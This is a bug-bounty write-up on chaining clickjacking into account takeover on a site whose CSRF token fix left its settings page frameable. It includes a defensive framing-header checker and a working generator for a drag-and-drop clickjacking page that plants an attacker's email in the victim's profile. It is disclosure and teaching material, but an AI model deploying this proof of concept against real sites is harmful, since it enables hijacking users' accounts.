Clickjacking to Account Takeover

Clickjacking is an attack in which a user is tricked into clicking on something they did not intend to click, which means an attacker can potentially perform any action the user can perform on the web app, much like CSRF. The difference is that clickjacking needs the victim to interact with the page (a click, a drag) to complete the action, whereas CSRF needs no interaction beyond visiting the attacker's page, because the forged request can be fired automatically with JavaScript.

On its own it is usually considered a low-severity finding, but if the framed URL performs a critical action, like deleting or adding a user or changing a user's email address, some companies (Google, for example) will rate it medium or high.

So I was looking for bugs on a website and reported a CSRF issue that led to account takeover. After a few weeks they fixed it by adding a CSRF token/key to the request, like so.

I tried bypassing it in various ways but had no luck, until I discovered that the page is vulnerable to clickjacking. I use a website that tells me whether a URL can be clickjacked or not.

Because the URL can be framed, the CSRF token no longer matters: the attacker never has to forge the request at all. The victim's own browser loads the genuine page, with a valid token already embedded, inside an invisible iframe on the attacker's site, and the victim is tricked into submitting that real form. Two things have to hold for this to work. The response must not carry an X-Frame-Options header (DENY or SAMEORIGIN) or a Content-Security-Policy frame-ancestors directive that excludes the attacker's origin, and the session cookie must still be sent to the framed page, which it will not be if the cookie is marked SameSite=Lax or SameSite=Strict, since the frame is a cross-site request. The page in question lets the user change their name and email and looked like this.
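The header check above, as an added example (not a tool from the original post): it models how browsers evaluate X-Frame-Options and CSP frame-ancestors for a given embedding origin. The header sets and the victim.example, evil.example and partner.example URLs are constructed for illustration, and the handling of ALLOW-FROM and unrecognised X-Frame-Options values as "ignored" is an assumption matching Chromium that you should confirm in the browser the victim actually uses.

```python
"""Offline check of whether a page can still be framed by an attacker origin.

Added example for this post, not a tool the author used. It models the
browser rules for X-Frame-Options and CSP frame-ancestors; the header sets
below are constructed for illustration, and the URLs are made up.
"""
from fnmatch import fnmatchcase
from urllib.parse import urlsplit


def origin_of(url):
    """Lowercased scheme://host[:port] of a URL."""
    u = urlsplit(url)
    return f"{u.scheme.lower()}://{u.netloc.lower()}"


def _header(headers, name):
    """Case-insensitive header lookup (response headers are a plain dict here)."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def _frame_ancestors(csp):
    """Source list of the frame-ancestors directive, or None if it is absent.
    An empty list means the directive was present with no sources, which the
    spec treats like 'none'."""
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None


def _source_allows(source, embedder, page_origin):
    """Match one frame-ancestors source expression against the embedding origin.
    Simplified: keyword sources, scheme sources (https:) and host sources with
    an optional leading wildcard, scheme and port."""
    if source == "'none'":
        return False
    if source == "*":
        return True
    if source == "'self'":
        return embedder == page_origin
    emb = urlsplit(embedder)
    if source.endswith(":") and "/" not in source:   # scheme source such as https:
        return emb.scheme == source[:-1]
    src = urlsplit(source if "://" in source else "//" + source)
    if src.scheme and src.scheme != emb.scheme:
        return False
    host_ok = fnmatchcase(emb.hostname or "", src.hostname or "")
    port_ok = src.port is None or src.port == emb.port
    return host_ok and port_ok


def can_be_framed(headers, page_url, attacker_url):
    """True if a page at page_url, served with these headers, may be embedded by attacker_url."""
    page_origin = origin_of(page_url)
    attacker_origin = origin_of(attacker_url)
    csp = _header(headers, "Content-Security-Policy")
    if csp is not None:
        ancestors = _frame_ancestors(csp)
        if ancestors is not None:
            # When frame-ancestors is present it governs and X-Frame-Options is ignored.
            return any(_source_allows(s, attacker_origin, page_origin) for s in ancestors)
    xfo = _header(headers, "X-Frame-Options")
    if xfo is None:
        return True
    value = xfo.strip().lower()
    if value == "deny":
        return False
    if value == "sameorigin":
        return attacker_origin == page_origin
    # ALLOW-FROM and unrecognised values: assumed to be ignored (Chromium
    # behaviour); confirm in the browser the victim actually uses.
    return True


# Constructed header sets, not captured from any real site.
SAMPLE_RESPONSES = {
    "no protection": {"Content-Type": "text/html"},
    "xfo deny": {"X-Frame-Options": "DENY"},
    "xfo sameorigin": {"X-Frame-Options": "SAMEORIGIN"},
    "csp self": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'self'"},
    "csp partner, xfo ignored": {
        "x-frame-options": "DENY",
        "content-security-policy": "frame-ancestors https://*.partner.example",
    },
}


def audit(page_url, attacker_url, responses=SAMPLE_RESPONSES):
    """Map each sample name to whether attacker_url could frame the page."""
    return {name: can_be_framed(h, page_url, attacker_url) for name, h in responses.items()}


if __name__ == "__main__":
    for name, framable in audit("https://victim.example/settings", "https://evil.example").items():
        print(f"{name:28s} {'FRAMABLE' if framable else 'blocked'}")
```

A page is only safely out of reach when the answer is "blocked" for every origin you do not control; note that frame-ancestors cannot be set from a meta tag, so only the response header counts, and that a SameSite=Lax or Strict session cookie independently defeats the attack even when framing is allowed.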

To exploit this I created a page in which the user has to drag something into a box and then click a button. What was really happening in the background was that the user was dragging text into the Email box and then clicking Save Changes, which led to account takeover.

The HTML code can be found here: https://pastebin.com/av71Mmf9. You can position the Finish button and the red blob as required and also change the text in the "DRAG ME TO THE RED BOX" element.
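A generator for a page of the kind described above, as an added example written for this post; it is not the pastebin code the author links to. Everything in it is assumed for illustration: the vulnerable profile page at victim.example, the attacker address, the frame size, and the rectangles where the Email input and Save Changes button sit once the page is framed. Measure the real rectangles in the browser's developer tools, and verify the drop actually reaches the framed input in the browser the victim would use before relying on it.

```python
"""Generate a drag-and-drop clickjacking proof-of-concept page.

Added example written for this post; it is not the pastebin code linked above.
Everything below is assumed for illustration: the vulnerable profile page is
TARGET_URL, and when it is framed at FRAME_SIZE its Email input and Save Changes
button sit at EMAIL_BOX and SAVE_BUTTON (left, top, width, height in CSS px).
Measure the real positions in the browser's developer tools.
"""
import html
import json
import pathlib

TARGET_URL = "https://victim.example/settings"   # assumed vulnerable page
ATTACKER_EMAIL = "attacker@evil.example"          # text the victim unknowingly drops into the Email field
FRAME_SIZE = (1200, 800)
EMAIL_BOX = (420, 260, 280, 36)                   # assumed rectangle of the Email input inside the frame
SAVE_BUTTON = (420, 330, 140, 40)                 # assumed rectangle of the Save Changes button


def _rect_css(rect):
    left, top, width, height = rect
    return f"left:{left}px;top:{top}px;width:{width}px;height:{height}px;"


def build_poc(target_url=TARGET_URL, payload=ATTACKER_EMAIL, email_box=EMAIL_BOX,
              save_button=SAVE_BUTTON, frame_size=FRAME_SIZE, frame_opacity=0.0):
    """Return the decoy page as an HTML string.

    Layering: decoy red box and Finish button at z-index 1; the target page in a
    fully transparent iframe at z-index 2, so the drop and the click land on the
    real Email input and Save Changes button (opacity does not affect hit
    testing); the draggable ticket at z-index 3, so the drag starts on our page
    rather than on the frame. Set frame_opacity to about 0.3 while aligning the
    decoys, then back to 0 for the real run.
    """
    width, height = frame_size
    js_payload = json.dumps(payload)               # safe JS string literal for the dropped text
    return f"""<!doctype html>
<html><head><meta charset="utf-8"><title>Claim your ticket</title>
<style>
  body {{ margin:0; font-family:sans-serif; }}
  #target {{ position:absolute; left:0; top:0; width:{width}px; height:{height}px;
             border:0; opacity:{frame_opacity}; z-index:2; }}
  .decoy {{ position:absolute; z-index:1; }}
  #drop {{ {_rect_css(email_box)} background:#e33; border:2px dashed #900; }}
  #finish {{ {_rect_css(save_button)} background:#2a2; color:#fff; font-size:18px; }}
  #ticket {{ position:absolute; left:40px; top:260px; z-index:3; cursor:grab; padding:10px;
             background:#ffd; border:1px solid #aa0; user-select:none; }}
</style></head>
<body>
  <h2 style="position:absolute;left:40px;top:40px">Drag the ticket to the red box, then press Finish</h2>
  <div id="ticket" draggable="true">DRAG ME TO THE RED BOX</div>
  <div id="drop" class="decoy"></div>
  <button id="finish" class="decoy">Finish</button>
  <iframe id="target" src="{html.escape(target_url, quote=True)}" scrolling="no"></iframe>
  <script>
    // Dropping text/plain onto a text field in the framed page inserts it there:
    // the victim sees a ticket landing in the red box, the Email input gets the payload.
    document.getElementById('ticket').addEventListener('dragstart', function (e) {{
      e.dataTransfer.setData('text/plain', {js_payload});
      e.dataTransfer.effectAllowed = 'copy';
    }});
  </script>
</body></html>
"""


def write_poc(path="poc.html", **kwargs):
    """Write the page to disk and return the path."""
    out = pathlib.Path(path)
    out.write_text(build_poc(**kwargs), encoding="utf-8")
    return str(out)


if __name__ == "__main__":
    print("wrote", write_poc())
```

Serve the written file from any host you control and open it logged in to the target: if the session cookie is sent to the frame and no framing protection is present, the drop fills the real Email field and the click on "Finish" submits the real form with its own valid CSRF token.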

I thought this was enough for a PoC and the impact was also high, so I sent the report and it got accepted. They fixed it and rewarded me pretty quickly.

Hope you learned something.

Thank you. 😁

Bug-Bounty | Pentester
